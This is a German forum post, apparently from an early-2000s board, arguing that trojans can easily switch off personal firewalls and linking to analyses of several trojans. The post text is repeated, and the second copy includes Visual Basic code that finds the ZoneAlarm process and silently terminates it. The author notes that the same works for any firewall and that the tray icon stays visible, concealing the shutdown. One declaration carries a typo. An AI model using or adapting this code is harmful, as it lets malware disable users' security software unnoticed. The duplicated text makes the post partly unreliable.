Limbus
Rail God
- Registriert
- März 2001
- Beiträge
- 138
Moin,
da eine Firewall als ganz normales Programm auf Eurem Computer läuft, ist es überhaupt kein Problem für einen Trojaner, die Firewall auszuschalten bzw. seine eigene Netzverbindung mitzubringen, die von der Firewall nicht entdeckt werden kann. Erste Viren und Trojaner, die dies auch praktizieren sind schon länger bekannt und es sollte auch schon weitere unbekannte geben:
http://www.chip.de/news_stories/news_stories_219093.html
http://www.symantec.com/avcenter/venc/data/w32.magistr.39921@mm.html
http://www.astonsoft.com/optix.htm
http://www.mischel.dhs.org/bionet312analysis.asp
http://www.y3knetwork.org/
http://www.mischel.dhs.org/buschtrommel100analysis.asp
Es gibt sicherlich noch weitere.
Wie einfach es ist, eine PF auszuschalten, zeigt dieser einfache VB Script der Zone Alarm ohne Warnmeldung beendet.
Lässt sich mit beliebeiger anderer PF machen. Das schöne ist aber, dass das Tray Icon erhalten bleibt, bis man mit der Maus drüber fährt.
Gruss Limbus
da eine Firewall als ganz normales Programm auf Eurem Computer läuft, ist es überhaupt kein Problem für einen Trojaner, die Firewall auszuschalten bzw. seine eigene Netzverbindung mitzubringen, die von der Firewall nicht entdeckt werden kann. Erste Viren und Trojaner, die dies auch praktizieren sind schon länger bekannt und es sollte auch schon weitere unbekannte geben:
http://www.chip.de/news_stories/news_stories_219093.html
http://www.symantec.com/avcenter/venc/data/w32.magistr.39921@mm.html
http://www.astonsoft.com/optix.htm
http://www.mischel.dhs.org/bionet312analysis.asp
http://www.y3knetwork.org/
http://www.mischel.dhs.org/buschtrommel100analysis.asp
Es gibt sicherlich noch weitere.
Wie einfach es ist, eine PF auszuschalten, zeigt dieser einfache VB Script der Zone Alarm ohne Warnmeldung beendet.
Code:
Option Explicit
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject
Asv Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess
As Long, ByVal uExitCode As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal
dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal
dwProcessId As Long) As Long
Const PROCESS_TERMINATE = &H1
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal
hWnd As Long, lpdwProcessId As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA"
(ByVal lpClassName As String, ByVal lpWindowName As String) As
Long
Private Sub Close_ZoneAlarm()
Dim xhwnd As Long
Dim pwid As Long
xhwnd = FindWindow(vbNullString, "ZoneAlarm")
GetWindowThreadProcessId xhwnd, pwid
Dim Task As Long, result As Long
Task = OpenProcess(PROCESS_TERMINATE, 0&, pwid)
TerminateProcess Task, 1&
CloseHandle Task
End Sub
Lässt sich mit beliebeiger anderer PF machen. Das schöne ist aber, dass das Tray Icon erhalten bleibt, bis man mit der Maus drüber fährt.
Gruss Limbus